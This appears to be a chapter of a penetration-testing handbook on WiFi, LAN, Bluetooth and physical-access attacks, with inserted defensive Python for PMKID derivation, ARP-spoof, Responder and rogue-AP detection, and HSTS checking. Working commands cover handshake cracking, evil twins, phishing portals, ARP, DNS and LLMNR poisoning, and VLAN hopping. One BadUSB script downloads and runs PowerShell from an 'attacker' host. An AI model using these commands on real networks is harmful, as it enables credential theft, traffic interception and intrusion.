Wireless & Network Attacks

WiFi exploitation, network-layer attacks, physical access vectors

Physical Proximity Required

Most attacks in this chapter require physical proximity to the target network. Wireless attacks need you within radio range. Network attacks often require being on the same LAN segment. Always have written authorization that explicitly covers wireless and network testing.

WiFi Attack Fundamentals

Wireless Adapter Setup

Effective WiFi attacks require an adapter that supports monitor mode and packet injection. Not all adapters support these features.

# Check if adapter supports monitor mode
iw list | grep -A 10 "Supported interface modes"

# Recommended chipsets:
# - Atheros AR9271 (ALFA AWUS036NHA)
# - Realtek RTL8812AU (ALFA AWUS036ACH)
# - Ralink RT3070 (various)

# Enable monitor mode
sudo airmon-ng check kill   # Kill interfering processes
sudo airmon-ng start wlan0  # Creates wlan0mon

# Verify monitor mode
iwconfig wlan0mon
# Should show: Mode:Monitor

Wireless Reconnaissance

# Scan for networks with airodump-ng
sudo airodump-ng wlan0mon

# Output columns explained:
# BSSID       - Access point MAC address
# PWR         - Signal strength (higher = closer)
# Beacons     - Number of beacon frames
# #Data       - Number of data packets
# CH          - Channel
# MB          - Maximum speed
# ENC         - Encryption (WPA2, WEP, OPN)
# CIPHER      - Cipher (CCMP, TKIP)
# AUTH        - Authentication (PSK, MGT)
# ESSID       - Network name

# Focus on specific channel/network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Lower section shows connected clients:
# STATION     - Client MAC address
# PWR         - Client signal strength
# Rate        - Connection speed
# Packets     - Number of packets

WPA2/WPA3 Attacks

WPA2-PSK Handshake Capture

WPA2-PSK security relies on a 4-way handshake. Capturing this handshake allows offline password cracking without further network interaction.

# Start capture on target network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Wait for client to connect, OR force reconnection with deauth
# In separate terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
#            │   │        │                      │
#            │   │        │                      └── Target client MAC
#            │   │        └── Access point BSSID
#            │   └── Number of deauth packets
#            └── Deauthentication attack

# airodump-ng will show "WPA handshake: AA:BB:CC:DD:EE:FF" when captured

# Verify handshake
aircrack-ng handshake-01.cap
# Should show: "1 handshake"

Offline Password Cracking

# Convert capture to hashcat format
cap2hccapx handshake-01.cap handshake.hccapx

# Or for newer format
hcxpcapngtool -o handshake.22000 handshake-01.cap

# Crack with hashcat
hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Crack with aircrack-ng (slower but simpler)
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

# Common WiFi password patterns to try:
# - Company name + year (Acme2024)
# - Street address (123MainSt)
# - Phone numbers (5551234567)
# - Simple patterns (Password1, Welcome1)

PMKID Attack (Clientless)

The PMKID attack captures authentication material from the AP itself; no client deauthentication is required:

# Using hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Wait until PMKID is captured (usually within minutes)
# Look for: [FOUND PMKID]

# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid.22000 wordlist.txt

Why PMKID Works

The PMKID is calculated as: HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_Client). Since we know all inputs except PMK (derived from password), we can brute force offline. This attack works against WPA2-Personal and some WPA3-Personal (Transition Mode).
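The derivation above, worked through in Python as an added example (this is not code from the page or from any of the tools it names): the PMK comes from PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 rounds, 32 bytes, as IEEE 802.11 specifies for WPA2-Personal, and the PMKID is the first 16 bytes of HMAC-SHA1 over "PMK Name" || MAC_AP || MAC_Client. The LabNet SSID, the "correct horse" passphrase and both MAC addresses are constructed; the "IEEE"/"password" pair is the passphrase-to-PSK test vector published in the 802.11 standard.

```python
import hashlib
import hmac


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' or 'aa-bb-cc-dd-ee-ff' -> six raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"bad MAC address: {mac}")
    return raw


def compute_pmkid(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_Client): the first
    16 bytes of the HMAC-SHA1 tag (the WPA2 derivation)."""
    msg = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(client_mac)
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16]


def pmkid_for_network(ssid: str, passphrase: str, ap_mac: str, client_mac: str) -> str:
    """Hex PMKID an AP with this SSID/passphrase would send to this client."""
    return compute_pmkid(derive_pmk(ssid, passphrase), ap_mac, client_mac).hex()


if __name__ == "__main__":
    # Constructed lab values; not from any real network.
    ssid, ap, sta = "LabNet", "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"
    print("PMKID with the real passphrase :", pmkid_for_network(ssid, "correct horse", ap, sta))
    print("PMKID with a wrong passphrase  :", pmkid_for_network(ssid, "correct horsf", ap, sta))
    print("PMK for the 802.11 test vector :", derive_pmk("IEEE", "password").hex())
```

Everything the function consumes except the passphrase (SSID, both MACs, the PMKID itself) travels in the clear in the first EAPOL frame, which is the whole reason an offline guess-and-compare is possible. The 4096 PBKDF2 rounds bound the rate per candidate, so what decides the outcome is the passphrase's entropy: a long random passphrase that is not derived from the SSID or the organisation name is the defence. Note also that an AP only exposes a PMKID when it includes the PMKID KDE in EAPOL message 1 (PMK caching / roaming support), so not every WPA2 network is exposed to the clientless variant.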

WPA3 Considerations

# WPA3-Personal uses SAE (Simultaneous Authentication of Equals)
# - Resistant to offline dictionary attacks
# - No handshake to capture

# However:
# 1. Transition mode (WPA2/WPA3 mixed) still allows WPA2 attacks
# 2. Downgrade attacks may force WPA2 connection
# 3. Side-channel attacks (Dragonblood) exist but are complex

# Check if network is WPA3-only or Transition:
sudo airodump-ng wlan0mon
# Look for "WPA3" or "SAE" in AUTH column

Evil Twin Attacks

Create a fake access point mimicking the target network. Clients connect to you instead, allowing credential capture and MITM attacks.

Basic Evil Twin Setup

# Using hostapd-wpe for WPA2-Enterprise attack
# Install: apt install hostapd-wpe

# Create configuration file
# ssid= is the target network name. hostapd takes everything after '=' as the
# value, so config lines must not carry trailing comments.
cat > /etc/hostapd-wpe/hostapd-wpe.conf << EOF
interface=wlan0
driver=nl80211
ssid=CorpNetwork
channel=6
hw_mode=g
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
dh_file=/etc/hostapd-wpe/certs/dh
EOF

# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# When clients connect with credentials:
# username: jsmith
# challenge: aa:bb:cc:dd:ee:ff:00:11
# response: 11:22:33:44:55:66:77:88

# Crack captured hash
asleap -C aa:bb:cc:dd:ee:ff:00:11 -R 11:22:33:44:55:66:77:88 -W wordlist.txt

Captive Portal Attack

# Using Wifiphisher for automated evil twin with captive portal
sudo wifiphisher -aI wlan0 -jI wlan1 -p oauth-login

# Options:
# -aI     - Interface for AP
# -jI     - Interface for jamming (deauth)
# -p      - Phishing scenario
# --essid - Target network name

# Scenarios include:
# - oauth-login      - Fake Google/social login
# - wifi-connect     - "Enter password to connect"
# - firmware-upgrade - "Router firmware update"
# - plugin_update    - "Browser plugin required"

# Credentials captured are logged to file

Network Layer Attacks

ARP Spoofing/Poisoning

ARP has no authentication. By sending fake ARP responses, you can associate your MAC with the gateway IP, causing all traffic to flow through you.

# Enable IP forwarding (so traffic continues to destination)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Using arpspoof (dsniff package)
# Terminal 1: Poison target, claim to be gateway
sudo arpspoof -i eth0 -t 192.168.1.100 -r 192.168.1.1
#                         │                │
#                         │                └── Gateway IP
#                         └── Target IP

# Now all traffic from 192.168.1.100 flows through us

# Using bettercap (more powerful)
sudo bettercap -iface eth0

# In bettercap console:
net.probe on                    # Discover hosts
set arp.spoof.targets 192.168.1.100
arp.spoof on
net.sniff on                    # Capture traffic
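The flip side of the poisoning above is that it is noisy: the gateway IP is suddenly advertised by a second MAC, one MAC answers for several IPs, and the fake replies repeat every few seconds. The following is an added detection example, not code from the page or from arpspoof/bettercap. The ARP reply records, the MAC addresses and the KNOWN_GOOD baseline are constructed; in practice the records would come from a sniffer (scapy's sniff(filter="arp")) or from arpwatch's log.

```python
from collections import defaultdict

# Constructed ARP reply records: (time_s, sender_ip, sender_mac).
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1",   "00:11:22:33:44:01"),   # legitimate gateway
    (1.0, "192.168.1.100", "00:11:22:33:44:64"),   # legitimate workstation
    (5.0, "192.168.1.1",   "de:ad:be:ef:00:01"),   # gateway IP suddenly claimed by another MAC
    (5.5, "192.168.1.100", "de:ad:be:ef:00:01"),   # same MAC also claims the workstation (two-way poison)
    (6.0, "192.168.1.1",   "de:ad:be:ef:00:01"),   # repeated to keep caches poisoned
    (7.0, "192.168.1.1",   "de:ad:be:ef:00:01"),
]

# Bindings we trust, recorded at baseline or configured statically (constructed).
KNOWN_GOOD = {"192.168.1.1": "00:11:22:33:44:01"}


def detect_arp_spoofing(replies, known_good):
    """Return (time, kind, detail) alerts for ARP replies that contradict known or
    previously seen IP-to-MAC bindings."""
    alerts = []
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    for t, ip, mac in replies:
        mac = mac.lower()
        expected = known_good.get(ip, "").lower()
        if expected and mac != expected and mac not in ip_to_macs[ip]:
            # Strongest signal: a baseline binding (the gateway) changed.
            alerts.append((t, "KNOWN_BINDING_CHANGED",
                           f"{ip} now advertised by {mac}, expected {expected}"))
        elif not expected and ip_to_macs[ip] and mac not in ip_to_macs[ip]:
            # No baseline, but the IP was already seen from a different MAC.
            alerts.append((t, "IP_MULTIPLE_MACS",
                           f"{ip} seen from {sorted(ip_to_macs[ip] | {mac})}"))
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    # Weak signal on its own: routers and VRRP/HSRP gateways legitimately answer for
    # several IPs. Combined with the alerts above it names the attacker's MAC.
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            alerts.append((None, "MAC_CLAIMS_MULTIPLE_IPS",
                           f"{mac} answers for {sorted(ips)}"))
    return alerts


if __name__ == "__main__":
    for t, kind, detail in detect_arp_spoofing(SAMPLE_ARP_REPLIES, KNOWN_GOOD):
        print(f"[{t}] {kind}: {detail}")
```

On the network side the same observation is what Dynamic ARP Inspection enforces on managed switches (dropping replies that contradict the DHCP snooping binding table); on hosts, a static ARP entry for the gateway removes the cache the attack poisons.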

Man-in-the-Middle with SSL Strip

# Using bettercap for HTTPS downgrade
sudo bettercap -iface eth0

# Enable modules
set arp.spoof.targets 192.168.1.100
set http.proxy.sslstrip true
set net.sniff.local true

arp.spoof on
http.proxy on
net.sniff on

# bettercap will:
# 1. Intercept HTTPS connections
# 2. Strip HTTPS, serve HTTP to victim
# 3. Forward to real site over HTTPS
# 4. Capture credentials in plaintext

# Works against sites without HSTS preload
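Whether a site is exposed to the HTTPS downgrade above comes down to its Strict-Transport-Security policy, and the "HSTS preload" caveat deserves a concrete check. The following is an added example, not code from the page or from bettercap: it parses an HSTS header value and reports whether the policy protects returning visitors only, or meets the published preload-list requirements (max-age of at least one year, includeSubDomains, and the preload token), which is what closes the first-visit window. The header strings are constructed samples.

```python
ONE_YEAR = 31536000  # minimum max-age the HSTS preload list accepts


def parse_hsts(header: str) -> dict:
    """Split a Strict-Transport-Security value into lower-cased directive -> value."""
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"')
    return directives


def assess_hsts(header) -> dict:
    """Judge how far an HSTS policy defends against HTTPS stripping."""
    if header is None:
        return {"policy": False, "max_age": 0, "include_subdomains": False,
                "preload_eligible": False,
                "note": "no HSTS header: every visit can be downgraded"}
    d = parse_hsts(header)
    try:
        max_age = int(d.get("max-age", "0"))
    except ValueError:
        max_age = 0
    include_sub = "includesubdomains" in d
    policy = max_age > 0
    preload_eligible = max_age >= ONE_YEAR and include_sub and "preload" in d
    if not policy:
        note = "max-age missing or 0: no policy, or an existing one is being withdrawn"
    elif preload_eligible:
        note = "meets preload requirements: protected from the first visit once listed"
    else:
        note = "protects only returning visitors within max-age; the first visit is exposed"
    return {"policy": policy, "max_age": max_age, "include_subdomains": include_sub,
            "preload_eligible": preload_eligible, "note": note}


if __name__ == "__main__":
    # Constructed header values.
    for sample in (None, "max-age=300", "max-age=31536000; includeSubDomains; preload", "max-age=0"):
        print(repr(sample), "->", assess_hsts(sample)["note"])
```

In a real audit the header would be read from the response of the site's HTTPS origin (for example with urllib or curl); the function above deliberately takes the string so it runs offline. Note that even a preloaded domain is only protected in browsers shipping the list, and that the policy says nothing about plain-HTTP subresources the page itself loads.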

DNS Spoofing

# Using bettercap
set dns.spoof.domains *.google.com, *.facebook.com
set dns.spoof.address 192.168.1.50   # Your malicious server
dns.spoof on

# Or using Ettercap
# Create /etc/ettercap/etter.dns:
*.google.com A 192.168.1.50
*.facebook.com A 192.168.1.50

# Run ettercap
sudo ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

LLMNR/NBT-NS Poisoning

Windows systems broadcast name resolution requests. By responding to these, you capture NTLMv2 hashes without any network modification. This is often a precursor to lateral movement—use captured hashes for Pass-the-Hash attacks or crack them for plaintext credentials (see Credential Access).

# Using Responder
sudo responder -I eth0 -wrf

# Options:
# -w    Enable WPAD rogue proxy
# -r    Answer NetBIOS wredir suffix queries (NBT-NS poisoning itself is on by default)
# -f    Fingerprint hosts

# When Windows machine tries to resolve a name:
# 1. DNS fails (name doesn't exist)
# 2. System broadcasts LLMNR/NBT-NS query
# 3. Responder answers "I'm that host!"
# 4. Victim connects, sends NTLMv2 hash

# Hashes saved to /usr/share/responder/logs/
# Format: username::domain:challenge:response:...

# Crack with hashcat
hashcat -m 5600 hashes.txt wordlist.txt

Detection Opportunity

LLMNR/NBT-NS poisoning is extremely common in internal pentests. Defenders should: disable LLMNR (Group Policy), disable NBT-NS (network adapter settings), and monitor for Responder-like traffic patterns.
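The "Responder-like traffic patterns" are concrete enough to code against: a single host answering LLMNR (UDP 5355, multicast 224.0.0.252) or NBT-NS (UDP 137, broadcast) lookups for many unrelated names, answering "wpad", or answering a canary name that no real host owns. The following is an added detection example, not code from the page or from Responder. The event records, IP addresses, names and the canary name are constructed; in production the events would come from a packet sensor or a honeypot host that issues the canary queries on a schedule.

```python
from collections import defaultdict

LLMNR_PORT = 5355   # multicast to 224.0.0.252 / ff02::1:3
NBTNS_PORT = 137    # broadcast on the local subnet
CANARY_NAMES = {"nonexistent-host-canary"}  # names we resolve on purpose; nobody should answer

# Constructed name-resolution events, not a real capture. Fields:
# (time_s, src_ip, dst_ip, service_port, queried_name, is_response)
SAMPLE_EVENTS = [
    (0.0,  "10.0.0.23", "224.0.0.252", 5355, "fileserver01", False),
    (0.1,  "10.0.0.23", "224.0.0.252", 5355, "fileserver01", False),   # retry
    (0.2,  "10.0.0.99", "10.0.0.23",   5355, "fileserver01", True),    # answered by .99
    (3.0,  "10.0.0.41", "10.0.0.255",  137,  "printsrv",     False),
    (3.1,  "10.0.0.99", "10.0.0.41",   137,  "printsrv",     True),    # .99 again, over NBT-NS
    (8.0,  "10.0.0.23", "224.0.0.252", 5355, "wpad",         False),
    (8.1,  "10.0.0.99", "10.0.0.23",   5355, "wpad",         True),    # proxy auto-config hijack
    (20.0, "10.0.0.7",  "224.0.0.252", 5355, "nonexistent-host-canary", False),
    (20.1, "10.0.0.99", "10.0.0.7",    5355, "nonexistent-host-canary", True),
    (25.0, "10.0.0.12", "10.0.0.33",   137,  "hr-share",     True),    # the real owner answering once
]


def detect_poisoner(events, distinct_name_threshold=3, canary_names=CANARY_NAMES):
    """Return (time, kind, detail) alerts for hosts answering like a poisoner."""
    answered = defaultdict(set)
    alerts = []
    for t, src, dst, port, name, is_resp in events:
        if not is_resp or port not in (LLMNR_PORT, NBTNS_PORT):
            continue
        n = name.lower()
        if n == "wpad":
            alerts.append((t, "WPAD_ANSWERED", f"{src} answered a WPAD lookup on port {port}"))
        if n in canary_names:
            alerts.append((t, "CANARY_ANSWERED", f"{src} answered canary name {name}"))
        answered[src].add(n)
    # A legitimate host answers for its own name(s); one answering many is poisoning.
    for src, names in sorted(answered.items()):
        if len(names) >= distinct_name_threshold:
            alerts.append((None, "MANY_NAMES_ANSWERED",
                           f"{src} answered {len(names)} different names: {sorted(names)}"))
    return alerts


if __name__ == "__main__":
    for t, kind, detail in detect_poisoner(SAMPLE_EVENTS):
        print(f"[{t}] {kind}: {detail}")
```

The canary check is the cheapest of the three and has no false positives by construction. For the fixes the page lists: the Group Policy setting "Turn off multicast name resolution" (Computer Configuration > Administrative Templates > Network > DNS Client) writes EnableMulticast=0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient, and NBT-NS is switched off per adapter under the WINS tab ("Disable NetBIOS over TCP/IP") or for all DHCP clients via the DHCP NetBIOS option.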

VLAN Attacks

VLAN Hopping

# DTP (Dynamic Trunking Protocol) attack
# If switch port is set to "dynamic" (Cisco default), you can become a trunk

# Using Yersinia
sudo yersinia -G    # GUI mode
# Select DTP tab → "Enable trunking"

# Or command line:
sudo yersinia dtp -attack 1 -interface eth0

# Once trunk is established, tag packets for other VLANs
# Using Linux vconfig:
sudo vconfig add eth0 100    # Add VLAN 100
sudo ifconfig eth0.100 up
sudo dhclient eth0.100       # Get IP on VLAN 100

Double Tagging Attack

# Works when: attacker VLAN = switch native VLAN
# Outer tag is stripped by first switch, inner tag routes to target VLAN

# Using Scapy
from scapy.all import *

# Create double-tagged frame
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="192.168.100.1")/ICMP()
sendp(packet, iface="eth0")

# Limitations:
# - One-way only (replies go to real destination)
# - Requires being on native VLAN
# - Modern switches often mitigate this

Bluetooth Attacks

Bluetooth Reconnaissance

# Scan for discoverable devices
hcitool scan
# Returns: MAC address and device name

# Scan for all devices (including non-discoverable)
# Requires btscanner or specialized tools
sudo btscanner

# Get device info
hcitool info AA:BB:CC:DD:EE:FF

# List services
sdptool browse AA:BB:CC:DD:EE:FF

BlueBorne Vulnerability Check

# BlueBorne (2017) affected billions of devices
# Check if target is vulnerable:
python blueborne-scanner.py -t AA:BB:CC:DD:EE:FF

# Affected: Android, iOS, Windows, Linux (before patches)
# Allows: RCE without pairing

Bluetooth Low Energy (BLE)

# Scan for BLE devices
sudo hcitool lescan

# Using bettercap for BLE
sudo bettercap
ble.recon on

# Enumerate characteristics
sudo gatttool -b AA:BB:CC:DD:EE:FF --characteristics

# Read characteristic value
sudo gatttool -b AA:BB:CC:DD:EE:FF --char-read -a 0x000c

# BLE devices often have:
# - No authentication
# - Sensitive data in characteristics
# - Writable handles that change device behavior

Physical Security Bypass

USB Attack Vectors

# Rubber Ducky / BadUSB
# Appears as keyboard, types malicious commands

# Example Ducky Script for reverse shell:
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker/ps.ps1')"
ENTER

# USB Ethernet adapter (LAN Turtle, Bash Bunny)
# Becomes network gateway, captures traffic
# Can inject packets, perform MITM

# USB implant detection is difficult
# Defenses: USB port blockers, endpoint DLP

Network Implants

# Packet Squirrel / LAN Turtle
# Small device inserted between computer and network

# Capabilities:
# - Passive traffic capture
# - Active MITM
# - Reverse shell home
# - DNS spoofing

# Detection:
# - Network port mapping
# - MAC address monitoring
# - Physical inspection

# Raspberry Pi Zero as implant
# - PoE powered
# - WiFi for exfiltration
# - Full Linux OS for flexibility

Rogue Access Points

# Deploy rogue AP on internal network
# Bypasses wired network security

# Using hostapd
cat > /etc/hostapd/hostapd.conf << EOF
interface=wlan0
driver=nl80211
ssid=Guest-WiFi
hw_mode=g
channel=7
wpa=2
wpa_passphrase=SimplePassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF

# Set up NAT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

# Start AP
sudo hostapd /etc/hostapd/hostapd.conf

# Now capture all traffic from connected clients
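Both the evil twin earlier in this chapter (same ESSID, attacker's BSSID) and the rogue AP just shown (an SSID nobody provisioned, bridged to the wired LAN) are visible to a periodic wireless survey compared against an inventory. The following is an added example, not code from the page or from hostapd/airodump-ng: it classifies survey rows into evil-twin candidates, authorized radios advertising the wrong security, and unknown SSIDs. The inventory, the BSSIDs and the survey rows are constructed; a real survey would be an airodump-ng capture or a WIDS export, with the columns named as airodump-ng labels them.

```python
# Constructed inventory: which BSSIDs may advertise each of our SSIDs, and the
# (ENC, AUTH) pair each SSID must use, in airodump-ng's column terms.
AUTHORIZED_APS = {
    "CorpNetwork": {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"},
    "CorpGuest": {"aa:bb:cc:dd:ee:03"},
}
AUTHORIZED_SECURITY = {
    "CorpNetwork": ("WPA2", "MGT"),   # WPA2-Enterprise
    "CorpGuest": ("WPA2", "PSK"),
}

# Constructed survey rows: (bssid, channel, enc, auth, essid).
OBSERVED = [
    ("aa:bb:cc:dd:ee:01", 6,  "WPA2", "MGT", "CorpNetwork"),   # authorized AP
    ("de:ad:be:ef:00:01", 6,  "WPA2", "MGT", "CorpNetwork"),   # our SSID from an unknown radio
    ("de:ad:be:ef:00:02", 7,  "WPA2", "PSK", "Guest-WiFi"),    # SSID not in inventory
    ("aa:bb:cc:dd:ee:03", 11, "OPN",  "",    "CorpGuest"),     # known BSSID, wrong security
    ("ca:fe:00:00:00:01", 1,  "WPA2", "PSK", "NeighborNet"),   # probably a neighbour
]


def classify_survey(observed, authorized=AUTHORIZED_APS, security=AUTHORIZED_SECURITY):
    """Return (kind, bssid, essid, detail) findings for every row that is not an
    authorized AP behaving as configured."""
    findings = []
    for bssid, channel, enc, auth, essid in observed:
        bssid = bssid.lower()
        if essid in authorized:
            if bssid not in authorized[essid]:
                findings.append(("EVIL_TWIN_CANDIDATE", bssid, essid,
                                 f"our SSID on channel {channel} from a BSSID not in inventory"))
            elif (enc, auth) != security.get(essid):
                # An authorized radio that lost its security settings, or a clone
                # of a known BSSID advertising a weaker mode.
                findings.append(("SECURITY_MISMATCH", bssid, essid,
                                 f"expected {security.get(essid)}, observed {(enc, auth)}"))
        else:
            findings.append(("UNKNOWN_SSID", bssid, essid,
                             "not in inventory; look for this radio in switch MAC tables "
                             "before treating it as a rogue rather than a neighbour"))
    return findings


if __name__ == "__main__":
    for kind, bssid, essid, detail in classify_survey(OBSERVED):
        print(f"{kind:20} {bssid} {essid!r}: {detail}")
```

The wired correlation matters: an unknown SSID is only a rogue AP in this chapter's sense if its radio is plugged into the internal network, which 802.1X on access ports prevents in the first place. Against the WPA2-Enterprise evil twin the client-side control is equally important: supplicant profiles that pin the RADIUS server's CA and expected server name refuse the fake AP's certificate, so no challenge/response is ever sent for asleap to crack.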

Essential Tools